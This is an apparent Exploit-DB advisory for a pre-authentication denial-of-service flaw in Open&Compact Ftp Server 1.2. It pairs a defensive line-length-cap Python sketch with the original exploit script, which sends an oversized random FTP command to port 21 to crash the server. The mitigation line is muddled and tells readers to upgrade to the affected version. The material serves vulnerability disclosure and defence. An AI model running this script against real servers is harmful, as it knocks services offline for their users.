Vendor: Open&Compact Ftp Server
By: Dr_IDE and Ma3sTr0-Dz
CVSS: 7,5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Open&Compact Ftp Server
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:open_ftpd:open_ftpd:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service

Open&Compact Ftp Server 1.2 is vulnerable to a universal pre-authentication denial of service. A client that has not logged in can trigger it by sending a specially crafted command carrying a large amount of data. The server then crashes and becomes unresponsive.

Mitigation:

Upgrade to the latest version of Open&Compact Ftp Server 1.2
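
The server-side control for this class of bug is a hard cap on control-channel line length that is enforced before any command is parsed. The sketch below is an added example, not code from Open&Compact Ftp Server or from the advisory; `MAX_LINE`, `ControlLineReader` and `handle_stream` are hypothetical names, and the 512-byte cap is an assumption.

```python
# Added example: bounded FTP control-channel reader (not Open&Compact code).
MAX_LINE = 512  # assumed cap; size it to the longest path the server must accept


class LineTooLong(Exception):
    pass


class ControlLineReader:
    """Reassembles CRLF-terminated commands and refuses oversized ones."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()

    def feed(self, chunk):
        """Yield each complete command line found after appending chunk."""
        self.buf += chunk
        while True:
            end = self.buf.find(b"\r\n")
            # Unterminated data counts too, so a client cannot grow the
            # buffer without bound by withholding the CRLF.
            pending = len(self.buf) if end == -1 else end
            if pending > self.max_line:
                raise LineTooLong(pending)
            if end == -1:
                return
            line = bytes(self.buf[:end])
            del self.buf[:end + 2]
            yield line


def handle_stream(chunks, max_line=MAX_LINE):
    """Return (verb, arg_len) per accepted command, plus ("REJECT", n) on overflow."""
    reader = ControlLineReader(max_line)
    seen = []
    try:
        for chunk in chunks:
            for line in reader.feed(chunk):
                verb, _, arg = line.partition(b" ")
                seen.append((verb.upper().decode("ascii", "replace"), len(arg)))
    except LineTooLong as exc:
        seen.append(("REJECT", exc.args[0]))  # reply 500, close the socket
    return seen


# Constructed input: one oversized pre-auth command split as recv(1024) would.
oversized = b"USER " + b"A" * 9000 + b"\r\n"
segments = [oversized[i:i + 1024] for i in range(0, len(oversized), 1024)]
```

`handle_stream(segments)` rejects the connection on the first 1024-byte segment, before the rest of the line is ever buffered; the same `("REJECT", n)` event is a useful log signal for pre-auth abuse.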

Exploit-DB raw data:

#!/usr/bin/python
###################################################################
#
# Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service
# Coded By: Dr_IDE
# Found By: Ma3sTr0-Dz
# Date:     May 24, 2010
# Download: http://sourceforge.net/projects/open-ftpd/
# Tested:   Windows 7
#
###################################################################

import random, socket, sys

host = (sys.argv[1])
buff = ("A: " * 3000)
cmds = ['ABOR', 'APPE', 'ALLO', 'PORT', 'USER', 'PASS', 'PASV', 'MKD', 'SIZE']

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[i] Connecting to: " + host +"\r\n")
s.connect((host, 21))
d=s.recv(1024)
print (d)
magic=random.choice(cmds)
print ("[*] Finding vulnerable commands.\r\n")
print ("[*] Performing some kind of complex calculations...\r\n")
print ("[*] Crashing server with command: " + magic + "\r\n")
s.send(magic + " " + buff + '\r\n')
print ("[i] Server Down")
s.close()
         
# End